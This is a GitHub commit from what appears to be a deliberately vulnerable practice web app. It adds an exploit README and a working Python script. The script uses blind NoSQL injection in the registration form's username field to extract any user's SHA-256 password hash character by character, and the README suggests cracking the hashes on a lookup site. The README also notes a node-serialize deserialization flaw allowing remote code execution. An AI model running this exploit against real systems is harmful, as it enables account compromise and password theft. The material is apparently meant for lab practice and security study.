Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
William Moody
committed
Mar 21, 2021
1 parent
718ae2e
commit 51a41b3
Showing
2 changed files
with
60 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| # Exploits | ||
|
|
||
| ## Blind NoSQL Injection (Auth Bypass) | ||
| The `username` parameter in `POST /register` is subject to blind NoSQL injection. We can leverage this to dump the SHA-256 password hashes of any user in the database. | ||
|
|
||
| - PoC: `dumpPasswordHash.py` | ||
| - Usage: `python3 dumpPasswordHash.py ip:3000 user` | ||
|
|
||
| The passwords used in this app are weak on purpose, any the hashes can be looked up using a site such as https://crackstation.net/ | ||
|
|
||
| ## Deserialization (RCE) | ||
| The draft feature uses a vulnerable node package (`node-serialize`), which is vulnerable to deserialization which lets an attacker run arbitrary commands. | ||
|
|
||
| - PoC: `...` | ||
| - Usage: `...` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| #!/usr/bin/python3 | ||
| import requests | ||
| import sys | ||
|
|
||
| if len(sys.argv) != 3: | ||
| print("usage: %s TARGET USER" % sys.argv[0]) | ||
| sys.exit(-1) | ||
|
|
||
| target = sys.argv[1] | ||
| user = sys.argv[2] | ||
|
|
||
| # u: username | ||
| # i: index | ||
| # o: operator | ||
| # c: char (ascii val) | ||
| q = '%s\' && this.password.substring(%d,%d).charCodeAt(0)%s\'%d' | ||
| def oracle(u, i, o, c): | ||
| _q = q % (u, i, (i+1), o, c) | ||
| d = {'username':_q,'password':'x'} | ||
| r = requests.post('http://%s/register'%target,data=d,allow_redirects=False) | ||
| return 'User already exists' in r.text | ||
|
|
||
| print('(+) Dumping %s\'s password hash...'%user) | ||
| print('(+) ',end='') | ||
|
|
||
| for i in range(64): | ||
| low = 48 # '0' | ||
| high = 102 # 'f' | ||
| mid = 0 | ||
|
|
||
| while low <= high: | ||
| mid = (high + low) // 2 | ||
|
|
||
| if oracle(user, i, '>', mid): | ||
| low = mid + 1 | ||
|
|
||
| elif oracle(user, i, '<', mid): | ||
| high = mid - 1 | ||
|
|
||
| else: | ||
| sys.stdout.write(chr(mid)) | ||
| sys.stdout.flush() | ||
| break | ||
|
|
||
| print('\n(+) Done!') |